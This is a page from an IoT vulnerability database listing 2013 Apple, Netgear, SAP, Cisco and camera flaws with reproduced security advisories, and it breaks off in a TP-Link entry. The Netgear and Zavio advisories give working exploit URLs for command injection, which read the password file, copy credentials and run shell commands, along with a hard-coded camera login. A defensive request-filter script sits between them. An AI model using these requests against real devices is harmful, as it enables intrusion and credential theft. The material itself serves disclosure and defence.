VARIoT IoT vulnerabilities database
| VAR-201306-0026 | CVE-2013-0990 | Apple Mac OS X SMB Vulnerability Allowing File Creation Outside Shared Directories |
CVSS V2: 4.9 CVSS V3: - Severity: MEDIUM |
SMB in Apple Mac OS X before 10.8.4, when file sharing is enabled, allows remote authenticated users to create or modify files outside of a shared directory via unspecified vectors.
Note: This issue was previously covered in BID 60329 (Apple Mac OS X Security Update 2013-002 Multiple Security Vulnerabilities) but has been given its own record to better document it. Apple Mac OS X is prone to multiple vulnerabilities.
Attackers can exploit these issues to execute arbitrary code, cause denial-of-service conditions, gain unauthorized access, obtain sensitive information, bypass security restrictions, and perform other attacks.
These issues affect OS X prior to 10.8.4.
APPLE-SA-2013-06-04-1 OS X Mountain Lion v10.8.4 and Security Update
2013-002
OS X Mountain Lion v10.8.4 and Security Update 2013-002 is now
available and addresses the following:
CFNetwork
Available for: OS X Mountain Lion v10.8 to v10.8.3
Impact: An attacker with access to a user's session may be able to
log into previously accessed sites, even if Private Browsing was used
Description: Permanent cookies were saved after quitting Safari,
even when Private Browsing was enabled. This issue was addressed by
improved handling of cookies.
CVE-ID
CVE-2013-0982 : Alexander Traud of www.traud.de
CoreAnimation
Available for: OS X Mountain Lion v10.8 to v10.8.3
Impact: Visiting a maliciously crafted site may lead to an
unexpected application termination or arbitrary code execution
Description: An unbounded stack allocation issue existed in the
handling of text glyphs. This could be triggered by maliciously
crafted URLs in Safari. The issue was addressed through improved
bounds checking.
CVE-ID
CVE-2013-0983 : David Fifield of Stanford University, Ben Syverson
CoreMedia Playback
Available for: OS X Lion v10.7 to v10.7.5,
OS X Lion Server v10.7 to v10.7.5,
OS X Mountain Lion v10.8 to v10.8.3
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An uninitialized memory access issue existed in the
handling of text tracks. This issue was addressed by additional
validation of text tracks.
CVE-ID
CVE-2013-1024 : Richard Kuo and Billy Suguitan of Triemt Corporation
CUPS
Available for: OS X Mountain Lion v10.8 to v10.8.3
Impact: A local user in the lpadmin group may be able to read or
write arbitrary files with system privileges
Description: A privilege escalation issue existed in the handling of
CUPS configuration via the CUPS web interface. A local user in the
lpadmin group may be able to read or write arbitrary files with
system privileges. This issue was addressed by moving certain
configuration directives to cups-files.conf, which can not be
modified from the CUPS web interface.
CVE-ID
CVE-2012-5519
Directory Service
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8
Impact: A remote attacker may execute arbitrary code with system
privileges on systems with Directory Service enabled
Description: An issue existed in the directory server's handling of
messages from the network. By sending a maliciously crafted message,
a remote attacker could cause the directory server to terminate or
execute arbitrary code with system privileges. This issue was
addressed through improved bounds checking.
CVE-ID
CVE-2013-0984 : Nicolas Economou of Core Security
Disk Management
Available for: OS X Mountain Lion v10.8 to v10.8.3
Impact: A local user may disable FileVault
Description: A local user who is not an administrator may disable
FileVault using the command-line. This issue was addressed by adding
additional authentication.
OpenSSL
Description: This issue was addressed by disabling compression in
OpenSSL. Further information is available via the OpenSSL website at
http://www.openssl.org/news/
CVE-ID
CVE-2011-1945
CVE-2011-3207
CVE-2011-3210
CVE-2011-4108
CVE-2011-4109
CVE-2011-4576
CVE-2011-4577
CVE-2011-4619
CVE-2012-0050
CVE-2012-2110
CVE-2012-2131
CVE-2012-2333
QuickDraw Manager
Available for: OS X Lion v10.7 to v10.7.5,
OS X Lion Server v10.7 to v10.7.5,
OS X Mountain Lion v10.8 to v10.8.2
Impact: Opening a maliciously crafted PICT image may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of PICT
images. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2013-0975 : Tobias Klein working with HP's Zero Day Initiative
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.5, OS X Lion Server v10.7 to v10.7.5,
OS X Mountain Lion v10.8 to v10.8.3
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of 'enof'
atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2013-0986 : Tom Gallagher (Microsoft) & Paul Bates (Microsoft)
working with HP's Zero Day Initiative
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.5, OS X Lion Server v10.7 to v10.7.5,
OS X Mountain Lion v10.8 to v10.8.3
Impact: Viewing a maliciously crafted QTIF file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
QTIF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2013-0987 : roob working with iDefense VCP
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.5, OS X Lion Server v10.7 to v10.7.5,
OS X Mountain Lion v10.8 to v10.8.3
Impact: Viewing a maliciously crafted FPX file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of FPX files.
This issue was addressed through improved bounds checking.
CVE-ID
CVE-2013-0988 : G. Geshev working with HP's Zero Day Initiative
QuickTime
Available for: OS X Mountain Lion v10.8 to v10.8.3
Impact: Playing a maliciously crafted MP3 file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of MP3 files.
This issue was addressed through improved bounds checking.
CVE-ID
CVE-2013-0989 : G. Geshev working with HP's Zero Day Initiative
Ruby
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8
Impact: Multiple vulnerabilities in Ruby on Rails
Description: Multiple vulnerabilities existed in Ruby on Rails, the
most serious of which may lead to arbitrary code execution on systems
running Ruby on Rails applications. These issues were addressed by
updating Ruby on Rails to version 2.3.18. Users can update affected
gems on such systems by using the /usr/bin/gem utility.
CVE-ID
CVE-2013-0155
CVE-2013-0276
CVE-2013-0277
CVE-2013-0333
CVE-2013-1854
CVE-2013-1855
CVE-2013-1856
CVE-2013-1857
SMB
Available for: OS X Lion v10.7 to v10.7.5,
OS X Lion Server v10.7 to v10.7.5,
OS X Mountain Lion v10.8 to v10.8.3
Impact: An authenticated user may be able to write files outside the
shared directory
Description: If SMB file sharing is enabled, an authenticated user
may be able to write files outside the shared directory. This issue
was addressed through improved access control.
CVE-ID
CVE-2013-0990 : Ward van Wanrooij
Note: Starting with OS X 10.8.4, Java Web Start (i.e. JNLP)
applications downloaded from the Internet need to be signed with
a Developer ID certificate. Gatekeeper will check downloaded
Java Web Start applications for a signature and block such
applications from launching if they are not properly signed.
Note: OS X Mountain Lion v10.8.4 includes the content of
Safari 6.0.5. For further details see "About the security content
of Safari 6.0.5" at http://support.apple.com/kb/HT5785
OS X Mountain Lion v10.8.4 and Security Update 2013-002 may be
obtained from the Software Update pane in System Preferences,
or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
The Software Update utility will present the update that applies
to your system configuration. Only one is needed, either
OS X Mountain Lion v10.8.4, or Security Update
2013-002.
For OS X Mountain Lion v10.8.3
The download file is named: OSXUpd10.8.4.dmg
Its SHA-1 digest is: 9cf99aa1293cefdac0fb9a24ea133c80f8237b5e
For OS X Mountain Lion v10.8 and v10.8.2
The download file is named: OSXUpdCombo10.8.4.dmg
Its SHA-1 digest is: 3c95d0c8d0c7f43339a5f4e137e386dd5fe409c3
For OS X Lion v10.7.5
The download file is named: SecUpd2013-002.dmg
Its SHA-1 digest is: cfc3bd0941d7c5838aee9e92ee087d78abff3ce7
For OS X Lion Server v10.7.5
The download file is named: SecUpdSrvr2013-002.dmg
Its SHA-1 digest is: 34dff575a145e13404e7a2ee8a390d3e7c56fb5e
For Mac OS X v10.6.8
The download file is named: SecUpd2013-002.dmg
Its SHA-1 digest is: 5da54b38ffb8c147925c3018a8f5bf30ad4ac5b1
For Mac OS X Server v10.6.8
The download file is named: SecUpdSrvr2013-002.dmg
Its SHA-1 digest is: b20271f019930fe894c2247a6d5e05f00568b583
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
| VAR-201306-0025 | CVE-2013-0975 | Apple Mac OS X QuickDraw Manager Buffer Overflow Vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Buffer overflow in QuickDraw Manager in Apple Mac OS X before 10.8.4 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT image. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the way QuickTime handles the LongComment PICT opcode. It converts an unsigned 16 bit value into a signed 32 bit value after it performs some mathematical operations on it. This value is later used as a size parameter for a memory copy function that copies from the file onto the heap. An attacker can leverage the situation to achieve remote code execution under the context of the user currently logged in. Apple Mac OS X is prone to multiple vulnerabilities.
Attackers can exploit these issues to execute arbitrary code, cause denial-of-service conditions, gain unauthorized access, obtain sensitive information, bypass security restrictions, and perform other attacks.
These issues affect OS X prior to 10.8.4.
Note: This issue was previously covered in BID 60329 (Apple Mac OS X Security Update 2013-002 Multiple Security Vulnerabilities), but has been given its own record to better document it. The affected components are listed in the APPLE-SA-2013-06-04-1 advisory reproduced under VAR-201306-0026 above.
| VAR-201306-0407 | No CVE | NetGear WPN824v3 Information Disclosure Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
NetGear WPN824v3 is a wireless router product from NetGear.
An information disclosure vulnerability exists in NetGear WPN824v3. Attackers can use this vulnerability to download configuration files and leak sensitive information. The acquired information can help further attacks.
| VAR-201305-0436 | No CVE | Multiple Netgear DGN Device Remote Authentication Bypass Vulnerabilities |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
NetGear DGN1000B and DGN2200 are both router products of NetGear.
A remote authentication bypass vulnerability exists in Netgear DGN1000 and DGN2200 devices. A remote attacker could use this vulnerability to bypass the authentication mechanism and execute arbitrary commands with elevated privileges in the context of the affected device. The following versions are affected: NetGear DGN1000 running firmware versions prior to 1.1.00.48, and Netgear DGN2200 v1.
Unauthenticated command execution on Netgear DGN devices
========================================================
[ADVISORY INFORMATION]
Title: Unauthenticated command execution on Netgear DGN devices
Discovery date: 01/05/2013
Release date: 31/05/2013
Credits: Roberto Paleari (roberto@greyhats.it, twitter: @rpaleari)
[VULNERABILITY INFORMATION]
Class: Authentication bypass, command execution
[AFFECTED PRODUCTS]
This security vulnerability affects the following products and firmware
versions:
* Netgear DGN1000, firmware version < 1.1.00.48
* Netgear DGN2200 v1
Other products and firmware versions are probably also vulnerable, but they
were not checked.
Briefly, the embedded web server skips authentication checks for some URLs
containing the "currentsetting.htm" substring. As an example, the following URL
can be accessed even by unauthenticated attackers:
http://<target-ip-address>/setup.cgi?currentsetting.htm=1
Then, the "setup.cgi" page can be abused to execute arbitrary commands. As an
example, to read the /www/.htpasswd local file (containing the clear-text
password for the "admin" user), an attacker can access the following URL:
http://<target-ip-address>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1
Basically this URL leverages the "syscmd" function of the "setup.cgi" script to
execute arbitrary commands. In the example above the command being executed is
"cat /www/.htpasswd", and the output is displayed in the resulting web
page. Slight variations of this URL can be used to execute arbitrary
commands. According to Netgear, DGN2200 v1 is not supported anymore, while v3
and v4 should not be affected by this issue; these versions were not tested by
the author.
[DISCLAIMER]
The author is not responsible for the misuse of the information provided in
this security advisory. The advisory is a service to the professional security
community. There are NO WARRANTIES with regard to this information. Any
application or distribution of this information constitutes acceptance AS IS,
at the user's own risk. This information is subject to change without notice.
| VAR-201305-0365 | No CVE | SAP NetWeaver Gateway SAP Client Enumeration Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
SAP NetWeaver Gateway allows developers to openly access SAP software from any environment or terminal for solution development. Because SAP NetWeaver Gateway does not properly restrict arbitrary RFC requests, remote attackers can enumerate valid SAP client numbers, which range from 000 to 999, through brute force attacks.
| VAR-201305-0499 | No CVE | Sony Playstation 3 File Handling Local Command Execution Vulnerability |
CVSS V2: 4.4 CVSS V3: - Severity: MEDIUM |
The PlayStation 3 is a home game console developed by Sony Computer Entertainment. A security vulnerability exists in the PlayStation 3 that allows a local attacker to build a specially crafted SFO file and execute arbitrary system commands when it is saved.
| VAR-201305-0363 | No CVE | SAP NetWeaver Gateway Account Violent Cracking Vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
SAP NetWeaver Gateway allows developers to openly access SAP software from any environment or terminal for solution development. The lock-out mechanism used by SAP NetWeaver Gateway to protect against brute force attacks is flawed. Because the account lock counter is reset at a predictable time (00:01 by default), a remote attacker can perform brute force attacks between the end of the working day and midnight so that the attack is not discovered right away.
| VAR-201305-0364 | No CVE | SAP NetWeaver Gateway RFC_ABAP_INSTALL_AND_RUN RFC Arbitrary command execution vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SAP NetWeaver Gateway allows developers to openly access SAP software from any environment or terminal for solution development. The RFC_ABAP_INSTALL_AND_RUN RFC provided by SAP NetWeaver Gateway has a security vulnerability. This RFC is used to execute ABAP source code, allowing authenticated remote attackers to execute arbitrary commands through it.
| VAR-201305-0119 | CVE-2013-1246 | Cisco TelePresence System Software Denial of Service (DoS) Vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cisco TelePresence System Software does not properly handle inactive t-shell sessions, which allows remote authenticated users to cause a denial of service (memory consumption and service outage) by establishing multiple SSH connections, aka Bug ID CSCug77610. Cisco TelePresence System is prone to a remote denial-of-service vulnerability.
Successfully exploiting this issue allows remote attackers to cause denial-of-service conditions.
This issue is being tracked by Cisco Bug ID CSCug77610. Cisco TelePresence is Cisco's family of video conferencing solutions. It provides components such as audio and video spaces that give remote participants the effect of a "face-to-face" virtual meeting room.
| VAR-201305-0148 | CVE-2013-1208 | Cisco NX-OS on Cisco Nexus 1000V Vulnerable to Interception or Modification of Network Traffic |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
The encryption functionality in Cisco NX-OS on the Nexus 1000V does not properly handle Virtual Supervisor Module (VSM) to Virtual Ethernet Module (VEM) communication, which allows remote attackers to intercept or modify network traffic by leveraging certain Layer 2 or Layer 3 access, aka Bug ID CSCud14691. The vendor has confirmed this vulnerability and tracks it as Bug ID CSCud14691. Network traffic may be intercepted or altered by a third party with Layer 2 or Layer 3 access. The Cisco Nexus series switches are data center switches running the Cisco NX-OS operating system.
Successful exploits will allow attackers to perform unauthorized actions and obtain sensitive information that may aid in further attacks.
This issue is being tracked by Cisco Bug ID CSCud14691
| VAR-201305-0150 | CVE-2013-1210 | Cisco NX-OS on Cisco Nexus 1000V Denial of Service (DoS) Vulnerability |
CVSS V2: 5.4 CVSS V3: - Severity: MEDIUM |
Array index error in the Virtual Ethernet Module (VEM) kernel driver for VMware ESXi in Cisco NX-OS on the Nexus 1000V, when STUN debugging is enabled, allows remote attackers to cause a denial of service (ESXi crash and purple screen of death) by sending crafted STUN packets to a VEM, aka Bug ID CSCud14825. The Cisco Nexus series switches are data center switches running the Cisco NX-OS operating system. Sending a specially crafted STUN message to the VEM crashes the ESXi hypervisor.
Successfully exploiting this issue allows remote attackers to cause denial-of-service conditions.
This issue is being tracked by Cisco Bug ID CSCud14825
| VAR-201305-0151 | CVE-2013-1211 | Cisco NX-OS on Cisco Nexus 1000V VEM Unauthorized Access Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco NX-OS on the Nexus 1000V does not properly handle authentication for Virtual Ethernet Module (VEM) to Virtual Supervisor Module (VSM) communication, which allows remote attackers to obtain VEM access via (1) spoofed STUN packets or (2) a crafted VMware ESXi instance, aka Bug ID CSCud14832. The vendor has confirmed this vulnerability and tracks it as Bug ID CSCud14832. A third party may gain access to the VEM via (1) spoofed STUN packets or (2) a crafted VMware ESXi instance. The Cisco Nexus series switches are data center switches running the Cisco NX-OS operating system.
Remote attackers can exploit this issue to bypass authentication mechanism and gain unauthorized access to an affected device. This may aid in further attacks.
This issue is being tracked by Cisco Bug ID CSCud14832.
| VAR-201305-0152 | CVE-2013-1212 | Cisco NX-OS on Cisco Nexus 1000V Vulnerable to Server Impersonation |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
The SSL functionality in Cisco NX-OS on the Nexus 1000V does not properly verify X.509 certificates, which allows man-in-the-middle attackers to spoof servers, and intercept or modify Virtual Supervisor Module (VSM) to VMware vCenter communication, via a crafted certificate, aka Bug ID CSCud14837. The Cisco Nexus series switches are data center switches running the Cisco NX-OS operating system.
An attacker can exploit this issue to perform man-in-the-middle attacks and perform certain unauthorized actions, which will aid in further attacks.
This issue is being tracked by Cisco Bug ID CSCud14837. Cisco NX-OS is Cisco's operating system for its data center switches.
| VAR-201305-0153 | CVE-2013-1213 | Cisco NX-OS on Cisco Nexus 1000V Denial of Service (DoS) Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco NX-OS on the Nexus 1000V does not assign the proper priority to heartbeat messages from a Virtual Ethernet Module (VEM) to a Virtual Supervisor Module (VSM), which allows remote attackers to cause a denial of service (false VEM unavailability report) via a flood of UDP packets, aka Bug ID CSCud14840. The vendor has confirmed this vulnerability and tracks it as Bug ID CSCud14840. A third party may cause a denial of service (a false report that the VEM is non-operational) by sending a large volume of UDP packets. The Cisco Nexus series switches are data center switches running the Cisco NX-OS operating system. Because heartbeat delivery fails, the VSM reports the affected VEM as unavailable, resulting in a denial of service.
Successfully exploiting this issue allows remote attackers to cause denial-of-service conditions.
This issue is being tracked by Cisco Bug ID CSCud14840
| VAR-201305-0468 | No CVE | YeaLink IP Phone SIP-T20P/SIP-T26P Security Bypass Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The YeaLink IP Phone SIP-T20P/SIP-T26P devices with firmware version <=9.70.0.100 have a security vulnerability that allows an attacker to use the first available SIP account to place a call without user confirmation; the caller can then also listen in through the microphone. YeaLink IP Phone SIP-T20P and SIP-T26P are both enterprise-grade IP phones from YeaLink of China. The SIP-T20P is characterized by easy installation and use, convenient management, and improved office efficiency; it is mainly used by SMEs, call centers, governments and industry users. The SIP-T26P supports VLAN and OpenVPN functions, making it suitable for professional users such as supervisors, receptionists, dispatchers and agents.
A security bypass vulnerability exists in YeaLink IP Phone SIP-T20P and SIP-T26P. An attacker could use this vulnerability to bypass specific security restrictions and perform unauthorized operations
| VAR-201305-0490 | No CVE | TP-LINK TL-WR842ND Directory Traversal Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
TP-LINK TL-WR842ND is a wireless router product of China TP-LINK company.
A directory traversal vulnerability exists in TP-LINK TL-WR842ND. A remote attacker could use this vulnerability to obtain sensitive information that can help launch further attacks. The TP-LINK TL-WR842ND running firmware version 3.12.22 Build 120424 Rel.39632n is vulnerable; other versions may also be affected. TP-LINK TL-WR842ND is prone to a directory-traversal vulnerability.
| VAR-202001-0852 | CVE-2013-2570 | Zavio IP Camera OS Command Injection Vulnerability |
Related entries in the VARIoT exploits database: VAR-E-201305-0003 |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
A Command Injection vulnerability exists in Zavio IP Cameras through 1.6.3 in the General.Time.NTP.Server parameter to the sub_C8C8 function of the binary /opt/cgi/view/param, which could let a remote malicious user execute arbitrary code. Zavio IP cameras have an OS command injection vulnerability: information may be obtained or falsified, and a denial of service (DoS) may result. Zavio IP Cameras are prone to a command-injection vulnerability.
Exploiting this issue could allow an attacker to execute arbitrary commands in the context of the affected device.
Zavio IP Cameras running firmware version 1.6.03 and below are vulnerable.
1. *Advisory Information*
Title: Zavio IP Cameras multiple vulnerabilities
Advisory ID: CORE-2013-0302
Advisory URL:
http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities
Date published: 2013-05-28
Date of last update: 2013-05-28
Vendors contacted: Zavio
Release mode: User release
2. *Vulnerability Information*
Class: Use of hard-coded credentials [CWE-798], OS command injection
[CWE-78], Incorrect default permissions [CWE-276], OS command injection
[CWE-78]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-2567, CVE-2013-2568, CVE-2013-2569, CVE-2013-2570
3. *Vulnerability Description*
Multiple vulnerabilities have been found in Zavio IP cameras based on
firmware v1.6.03 and below, that could allow an unauthenticated remote
attacker:
1. [CVE-2013-2567] to bypass user web interface authentication using
hard-coded credentials.
2. [CVE-2013-2568] to execute arbitrary OS commands through the 'ap'
parameter of 'wireless_mft.cgi' (Sec. 8.2). This flaw can also be used to
obtain all credentials of registered users.
3. [CVE-2013-2569] to access the camera video stream.
4. [CVE-2013-2570] to execute arbitrary OS commands, after authentication,
through the 'General.Time.NTP.Server' parameter of '/opt/cgi/view/param'
(Sec. 8.4).
4. *Vulnerable Packages*
.
5. *Non-Vulnerable Packages*
. Vendor did not provide details. Contact Zavio for further information.
6. *Vendor Information, Solutions and Workarounds*
There was no official answer from Zavio after several attempts to report
these vulnerabilities (see [Sec. 9]). Contact vendor for further
information.
Some mitigation actions may be:
. Do not expose the camera to Internet unless absolutely necessary.
. Enable RTSP authentication.
. Have at least one proxy filtering HTTP requests to 'manufacture.cgi' and
'wireless_mft.cgi'.
. Check the parameter 'General.Time.NTP.Server' in requests to
'/opt/cgi/view/param'.
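The proxy rules suggested above, written out as a request filter. This is an added example, not Core Security's or Zavio's code; it blocks requests to the hidden '/cgi-bin/mft/' scripts and rejects any 'General.Time.NTP.Server' value that is not a plain hostname or IPv4 address, which also covers the TP-Link 'wireless_mft.cgi' issue (CVE-2013-2573) further down this page. The request lines it scans are constructed for the example.

```python
"""Request filter for the CGI issues in the advisory above.

Added example; it is not Core Security's or Zavio's code. It applies the
mitigations listed in section 6 to HTTP request lines: block access to the
hidden '/cgi-bin/mft/' scripts ('manufacture.cgi', 'wireless_mft.cgi'), and
reject a 'General.Time.NTP.Server' value that is not a plain hostname or
IPv4 address. All request lines below are constructed for this example.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Scripts reachable only with the hard-coded 'manufacture' account (Sec. 8.1).
HIDDEN_MFT_PREFIX = "/cgi-bin/mft/"
# Both paths through which the vulnerable 'param' binary is reached (Sec. 8.4).
PARAM_ENDPOINTS = ("/cgi-bin/admin/param", "/opt/cgi/view/param")

# Allow-list for an NTP server: RFC 1123 hostname labels, which also match a
# dotted IPv4 address. Shell metacharacters such as ';' can never match.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def is_valid_ntp_server(value: str) -> bool:
    """True only if the value is syntactically a hostname or IPv4 address."""
    return _HOSTNAME_RE.match(value) is not None


def query_params(query: str):
    """Split a query string on '&' only and percent-decode each pair.

    Splitting on ';' as well (as older parse_qs versions did) would cut the
    injected command off the NTP value and let the remainder pass the check.
    """
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        yield unquote_plus(key), unquote_plus(value)


def classify_request(request_line: str) -> str:
    """Return 'allow', 'block-mft-cgi' or 'block-ntp-param' for one request line."""
    parts = request_line.split()
    if len(parts) < 2:
        return "allow"  # not an HTTP request line; leave it to other rules
    target = urlsplit(parts[1])
    if target.path.startswith(HIDDEN_MFT_PREFIX):
        return "block-mft-cgi"
    if target.path in PARAM_ENDPOINTS:
        for key, value in query_params(target.query):
            if key == "General.Time.NTP.Server" and not is_valid_ntp_server(value):
                return "block-ntp-param"
    return "allow"


def scan(request_lines):
    """Classify every request line; returns (verdict, line) pairs."""
    return [(classify_request(line), line) for line in request_lines]


# Constructed sample traffic: one clean time update, one request to the hidden
# MFT script, and one NTP value carrying a shell command in the PoC's shape.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/admin/param?action=update&General.Time.SyncSource=NTP"
    "&General.Time.NTP.Server=pool.ntp.org HTTP/1.1",
    "GET /cgi-bin/mft/wireless_mft?ap=test HTTP/1.1",
    "GET /cgi-bin/admin/param?action=update"
    "&General.Time.NTP.Server=x;/sbin/awpriv%20ra0%20get_site_survey; HTTP/1.1",
]

if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_REQUESTS):
        print(f"{verdict:16} {line}")
```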
7. *Credits*
These vulnerabilities were discovered and researched by Nahuel Riva and
Francisco Falcon from Core Exploit Writers Team. The publication of this
advisory was coordinated by Fernando Miranda from Core Advisories Team.
8. *Technical Description / Proof of Concept Code*
8.1. *Hard-Coded Credentials in Administrative Web Interface*
[CVE-2013-2567] Zavio IP cameras use the Boa web server [3], a popular
tiny server for embedded Linux devices. 'boa.conf' is the Boa
configuration file, and the following account can be found inside:
/-----
# MFT: Specify manufacture commands user name and password
MFT manufacture erutcafunam
-----/
This account is not visible from the user web interface; users are not
aware of its existence and cannot remove it. Through this account it
is possible to access two CGI files located in '/cgi-bin/mft/':
1. 'manufacture.cgi'
2. 'wireless_mft.cgi'
The last file contains the OS command injection shown in the following
section.
8.2. *OS Command Injection*
[CVE-2013-2568] The file '/cgi-bin/mft/wireless_mft.cgi' has an OS
command injection in the parameter 'ap' that can be exploited using the
hard-coded credentials shown in the previous section:
/-----
username: manufacture
password: erutcafunam
-----/
The following proof of concept copies the file where the user
credentials are stored in the web server root directory:
/-----
http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales
-----/
Afterwards, the user credentials can be obtained by requesting:
/-----
http://192.168.1.100/credenciales
-----/
8.3. *RTSP Authentication Disabled by Default*
[CVE-2013-2569] The RTSP protocol authentication is disabled by default.
Therefore, the live video stream can be accessed by a remote
unauthenticated attacker by requesting:
/-----
rtsp://192.168.1.100/video.h264
-----/
8.4. *OS Command Injection (Post-auth)*
[CVE-2013-2570] The command injection is located in the function
'sub_C8C8' of the binary '/opt/cgi/view/param'. The vulnerable parameter
is 'General.Time.NTP.Server'. The following proof of concept can be used
to obtain the complete list of access points by executing '/sbin/awpriv
ra0 get_site_survey':
/-----
http://192.168.1.100/cgi-bin/admin/param?action=update&General.Time.DateFormat=ymd&General.Time.SyncSource=NTP&General.Time.TimeZone=GMT-06:00/America/Mexico_City&General.Time.NTP.ServerAuto=no&General.Time.NTP.Server=sarasa!de!palermo;/sbin/awpriv%20ra0%20get_site_survey;&General.Time.NTP.Update=01:00:00&General.Time.DayLightSaving.Enabled=on&General.Time.DayLightSaving.Start.Type=date&General.Time.DayLightSaving.Stop.Type=date&General.Time.DayLightSaving.Start.Month=01&General.Time.DayLightSaving.Stop.Month=01&General.Time.DayLightSaving.Start.Week=1&General.Time.DayLightSaving.Stop.Week=1&General.Time.DayLightSaving.Start.Day=01&General.Time.DayLightSaving.Stop.Day=01&General.Time.DayLightSaving.Start.Date=01&General.Time.DayLightSaving.Stop.Date=01&General.Time.DayLightSaving.Start.Hour=00&General.Time.DayLightSaving.Stop.Hour=00&General.Time.DayLightSaving.Start.Min=00&General.Time.DayLightSaving.Stop.Min=00&Image.OSD.Enabled=off
-----/
9. *Report Timeline*
. 2013-03-19:
Core Security Technologies notifies the Zavio Tech Support and requests
a security manager to send a draft report regarding these
vulnerabilities. No reply received.
. 2013-05-02:
Core asks Zavio Tech Support for a security manager to send a
confidential report.
. 2013-05-09:
Core asks for a reply.
. 2013-05-14:
Core asks for a reply.
. 2013-05-21:
Core tries to contact vendor for last time without any reply.
. 2013-05-28:
After 5 failed attempts to report the issues, the advisory
CORE-2013-0302 is published as 'user-release'.
10. *References*
[1] http://www.zavio.com/product.php?id=25.
[2] http://zavio.com/product.php?id=23.
[3] http://www.boa.org/.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-202001-0855 | CVE-2013-2573 |
OS command injection vulnerability in multiple TP-Link IP camera products
Related entries in the VARIoT exploits database: VAR-E-201305-0137 |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
A Command Injection vulnerability exists in the ap parameter to the /cgi-bin/mft/wireless_mft.cgi file in TP-Link IP Cameras TL-SC 3130, TL-SC 3130G, 3171G, and 4171G 1.6.18P12s, which could let a malicious user execute arbitrary code. Multiple TP-Link IP camera products have an OS command injection vulnerability. Information may be obtained or tampered with, or a denial of service (DoS) condition may result. TP-LINK IP Cameras are network camera products. A remote attacker can bypass authentication on the affected product using a hard-coded username and password (see CVE-2013-2572), and then use this command injection vulnerability to execute arbitrary commands through the administrative web interface.
1. *Advisory Information*
Title: TP-Link IP Cameras Multiple Vulnerabilities
